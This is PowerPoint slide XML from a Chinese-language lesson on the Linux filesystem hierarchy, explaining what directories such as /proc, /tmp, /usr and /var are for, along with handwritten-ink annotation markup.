              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>lost+found</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：檔案系統發生問題時</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>會自動掃描磁碟試圖修正錯誤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>倘若找到遺失或錯誤的區段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>就會將這些區段轉成檔案存放於此目錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>等候管理人員進一步處理。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/media</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：此目錄可用來做為光碟、軟碟片、隨身碟與其他分割區的自動掛載點。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Fedora Core 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>及 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Fedora Core 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>光碟、軟碟片、隨身碟與其他分割區的掛載點是放在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>mnt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>目錄下。自 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Fedora Core 3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>以後則是在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/media </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>目錄下。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2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882720" y="1504800"/>
              <a:ext cx="1987920" cy="8316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6880" y="1441440"/>
                <a:ext cx="201960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4019400" y="1542960"/>
              <a:ext cx="2337480" cy="259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03560" y="1479600"/>
                <a:ext cx="236916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7169040" y="1549440"/>
              <a:ext cx="883080" cy="320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153200" y="1485720"/>
                <a:ext cx="91476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685800" y="2063880"/>
              <a:ext cx="5277240" cy="146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69960" y="2000160"/>
                <a:ext cx="5308920" cy="27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505640" y="2139840"/>
              <a:ext cx="90864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89800" y="2076480"/>
                <a:ext cx="94032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84280" y="2489040"/>
              <a:ext cx="3022920" cy="892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68440" y="2425680"/>
                <a:ext cx="305460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876240" y="3016080"/>
              <a:ext cx="2083320" cy="16560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60400" y="2952720"/>
                <a:ext cx="2115000" cy="29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888840" y="3594240"/>
              <a:ext cx="984600" cy="637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73000" y="3530520"/>
                <a:ext cx="10166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5924520" y="3537000"/>
              <a:ext cx="476640" cy="648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908680" y="3473280"/>
                <a:ext cx="50832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7182000" y="3632040"/>
              <a:ext cx="895680" cy="259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165800" y="3568680"/>
                <a:ext cx="9277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筆跡 15"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3619440" y="1581120"/>
              <a:ext cx="1524600" cy="320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3603600" y="1517760"/>
                <a:ext cx="15562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1314360" y="4107600"/>
              <a:ext cx="360" cy="147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298520" y="4044240"/>
                <a:ext cx="3204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985680" y="4079160"/>
              <a:ext cx="1172160" cy="43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969840" y="4015440"/>
                <a:ext cx="120384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5" name="筆跡 14"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2603520" y="5676840"/>
              <a:ext cx="79416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2587680" y="5613480"/>
                <a:ext cx="8258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9" name="筆跡 18"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="165240" y="1460520"/>
              <a:ext cx="793800" cy="21020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55880" y="1451160"/>
                <a:ext cx="812520" cy="212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66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000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1"/>
              <a:t>mnt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：此目錄可以做為手動掛載其他分割區的掛載點。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：系統核心和執行程序之間的資訊</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>比如說執行 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>free </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>等指令時所看到的訊息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>就是從這裡讀取。這目錄內的檔案並非真的存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>使用者看到的是如同幻影般的虛擬檔案。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>/root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：系統管理者專用的目錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>亦即 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>帳號的家目錄。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：此目錄存放啟動系統需執行的程式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>例如 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1"/>
              <a:t>fsck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1"/>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>grub </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>與 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1"/>
              <a:t>swapon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US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46080" y="1486080"/>
              <a:ext cx="533880" cy="51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30240" y="1422360"/>
                <a:ext cx="5655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920880" y="2025720"/>
              <a:ext cx="419400" cy="129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05040" y="1962000"/>
                <a:ext cx="4510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905280" y="1606680"/>
              <a:ext cx="546480" cy="25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89440" y="1542960"/>
                <a:ext cx="5781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444920" y="1555920"/>
              <a:ext cx="3404160" cy="702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429080" y="1492200"/>
                <a:ext cx="343584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971640" y="2616120"/>
              <a:ext cx="501840" cy="385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55800" y="2552760"/>
                <a:ext cx="53352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203560" y="2482920"/>
              <a:ext cx="3187800" cy="954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187720" y="2419200"/>
                <a:ext cx="321984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5537160" y="2540160"/>
              <a:ext cx="1752840" cy="763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521320" y="2476440"/>
                <a:ext cx="178488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4280" y="4438800"/>
              <a:ext cx="1460880" cy="255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8440" y="4375080"/>
                <a:ext cx="14929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921040" y="4425840"/>
              <a:ext cx="2635560" cy="3852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905200" y="4362480"/>
                <a:ext cx="26672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7093080" y="4483080"/>
              <a:ext cx="749520" cy="10836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077240" y="4419720"/>
                <a:ext cx="78120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7829640" y="4591080"/>
              <a:ext cx="648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813800" y="4527720"/>
                <a:ext cx="381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441440" y="4965840"/>
              <a:ext cx="921240" cy="129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25600" y="4902120"/>
                <a:ext cx="9529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4336200" y="3921840"/>
              <a:ext cx="1029240" cy="756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4320360" y="3858480"/>
                <a:ext cx="106092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6093720" y="3993120"/>
              <a:ext cx="1236240" cy="576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077880" y="3929760"/>
                <a:ext cx="12679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399960" y="1333440"/>
              <a:ext cx="889560" cy="32324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90600" y="1324080"/>
                <a:ext cx="908280" cy="325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170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000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：供全部使用者暫時放置檔案的目錄。系統預設可讓所有使用者讀取、寫入和執行檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>所有使用者皆能暫時利用此目錄存放檔案。這裡也是暫存檔的目錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>某些程式在執行中所產生的臨時檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>會存放在這個目錄內。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：此目錄包括許多子目錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>用來存放系統指令、程式等資訊</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>類似</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>C:\WINDOWS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>資料夾、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>Progam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t> Files)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US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933480" y="1486080"/>
              <a:ext cx="464040" cy="5112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17640" y="1422360"/>
                <a:ext cx="49572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095560" y="1530360"/>
              <a:ext cx="1962360" cy="38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79720" y="1467000"/>
                <a:ext cx="19940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336920" y="1581120"/>
              <a:ext cx="3296160" cy="3852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21080" y="1517760"/>
                <a:ext cx="332784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222640" y="2000160"/>
              <a:ext cx="2756160" cy="194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206800" y="1936800"/>
                <a:ext cx="27878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5854680" y="2070000"/>
              <a:ext cx="743400" cy="259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838840" y="2006640"/>
                <a:ext cx="7750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7270920" y="2050920"/>
              <a:ext cx="425520" cy="68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254720" y="1987560"/>
                <a:ext cx="4575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4857840" y="2006640"/>
              <a:ext cx="66060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842000" y="1943280"/>
                <a:ext cx="6922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946080" y="3911760"/>
              <a:ext cx="565560" cy="190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30240" y="3848040"/>
                <a:ext cx="5972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6756480" y="3930480"/>
              <a:ext cx="1346400" cy="450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740640" y="3867120"/>
                <a:ext cx="13780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844560" y="4394160"/>
              <a:ext cx="711720" cy="194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28720" y="4330800"/>
                <a:ext cx="74340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2305080" y="4368960"/>
              <a:ext cx="1581480" cy="255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289240" y="4305240"/>
                <a:ext cx="16131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筆跡 16"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1442880" y="4786200"/>
              <a:ext cx="5658480" cy="18612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27040" y="4722840"/>
                <a:ext cx="5690160" cy="31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6" name="筆跡 15"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="254160" y="1415880"/>
              <a:ext cx="654120" cy="26168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4800" y="1406520"/>
                <a:ext cx="672840" cy="2635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740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bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：放置使用者可以執行的指令程式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>如 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>find</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>free</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>等等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty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local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：此目錄用來存放自行編譯的軟體</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>以便與使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>RPM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>安裝的軟體互相區隔</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>避免兩個套件系統發生衝突的情況。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty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share/doc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：存放各種文件的目錄。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty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share/man</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：放置多種線上說明文件。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：存放原始碼的地方</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>系統核心的原始碼就放在這裡。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1460520" y="2031840"/>
              <a:ext cx="565560" cy="68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44680" y="1968480"/>
                <a:ext cx="5972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632040" y="2120760"/>
              <a:ext cx="235440" cy="38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616200" y="2057400"/>
                <a:ext cx="26712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939960" y="1562040"/>
              <a:ext cx="1194120" cy="702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23760" y="1498680"/>
                <a:ext cx="122616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939960" y="4826160"/>
              <a:ext cx="2419560" cy="446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23760" y="4762440"/>
                <a:ext cx="245160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4254480" y="4794120"/>
              <a:ext cx="406800" cy="133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238640" y="4730760"/>
                <a:ext cx="4384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5524560" y="4813200"/>
              <a:ext cx="2241720" cy="133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508720" y="4749840"/>
                <a:ext cx="22734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863640" y="4127400"/>
              <a:ext cx="1765800" cy="3852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47800" y="4064040"/>
                <a:ext cx="179748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4870440" y="4235400"/>
              <a:ext cx="1200600" cy="385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854600" y="4172040"/>
                <a:ext cx="123228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781200" y="5353200"/>
              <a:ext cx="990720" cy="255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65000" y="5289480"/>
                <a:ext cx="102276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584440" y="5321160"/>
              <a:ext cx="1708560" cy="684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568600" y="5257800"/>
                <a:ext cx="17402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7346880" y="5353200"/>
              <a:ext cx="933840" cy="446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331040" y="5289480"/>
                <a:ext cx="9655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015920" y="5867280"/>
              <a:ext cx="1873800" cy="2592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000080" y="5803920"/>
                <a:ext cx="19054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2736720" y="1587600"/>
              <a:ext cx="1664280" cy="446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720880" y="1523880"/>
                <a:ext cx="169596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5524560" y="1574640"/>
              <a:ext cx="6480" cy="684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5508720" y="1511280"/>
                <a:ext cx="385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5562720" y="1568520"/>
              <a:ext cx="2737080" cy="15264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546880" y="1504800"/>
                <a:ext cx="2768760" cy="28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2381400" y="4241880"/>
              <a:ext cx="1098720" cy="12096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2365200" y="4178160"/>
                <a:ext cx="113076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2978280" y="5365800"/>
              <a:ext cx="1492560" cy="3852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2962440" y="5302080"/>
                <a:ext cx="15242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2443320" y="2007360"/>
              <a:ext cx="750240" cy="1004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427120" y="1943640"/>
                <a:ext cx="7822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849960" y="2657520"/>
              <a:ext cx="1643400" cy="36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34120" y="2593800"/>
                <a:ext cx="16754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筆跡 23"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4293360" y="2643120"/>
              <a:ext cx="3515040" cy="28800"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="24" name="筆跡 2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277520" y="2579760"/>
                <a:ext cx="354672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筆跡 24"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="843120" y="3228840"/>
              <a:ext cx="478800" cy="360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="25" name="筆跡 2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826920" y="3165480"/>
                <a:ext cx="5108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筆跡 25"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1700280" y="5407560"/>
              <a:ext cx="650520" cy="360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="26" name="筆跡 25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1684440" y="5344200"/>
                <a:ext cx="6822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7" name="筆跡 26"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="196920" y="2349360"/>
              <a:ext cx="457560" cy="3105720"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="27" name="筆跡 26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187560" y="2340000"/>
                <a:ext cx="476280" cy="3124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730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000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：系統執行時</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>內容經常變動的資料或暫存檔</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>都會放置在這個目錄裡。包括使用者的郵件檔案、記載系統活動過程的記錄 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>(log) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>檔、列印工作的佇列檔、暫存檔及系統執行程式的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>PID (Process ID, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>程序識別碼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>記錄等等。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>Apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>網頁目錄與 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>FTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>目錄等伺服器的專用目錄也位於此處。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="30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認識系統的目錄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6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304920" y="584280"/>
              <a:ext cx="736920" cy="6732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9080" y="520560"/>
                <a:ext cx="768600" cy="80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851040" y="1479600"/>
              <a:ext cx="660600" cy="684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35200" y="1415880"/>
                <a:ext cx="6922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6870600" y="2006640"/>
              <a:ext cx="1010160" cy="255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854760" y="1943280"/>
                <a:ext cx="10418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743040" y="2470320"/>
              <a:ext cx="1098720" cy="255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27200" y="2406600"/>
                <a:ext cx="11304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3092400" y="2457360"/>
              <a:ext cx="5163120" cy="957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76560" y="2394000"/>
                <a:ext cx="519480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914400" y="2927520"/>
              <a:ext cx="2514960" cy="190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98560" y="2863800"/>
                <a:ext cx="25466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4267080" y="2959200"/>
              <a:ext cx="1073520" cy="648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251240" y="2895480"/>
                <a:ext cx="11052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6102360" y="2921040"/>
              <a:ext cx="188640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086520" y="2857680"/>
                <a:ext cx="19180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438120" y="3340080"/>
              <a:ext cx="5397840" cy="15264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22280" y="3276720"/>
                <a:ext cx="5429520" cy="27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5560" y="3911760"/>
              <a:ext cx="3702240" cy="10188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360" y="3848040"/>
                <a:ext cx="373428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4184640" y="3784680"/>
              <a:ext cx="1289520" cy="4464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168800" y="3720960"/>
                <a:ext cx="13212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565200" y="971640"/>
              <a:ext cx="476640" cy="59724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555840" y="962280"/>
                <a:ext cx="495360" cy="61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9514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sz="4400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
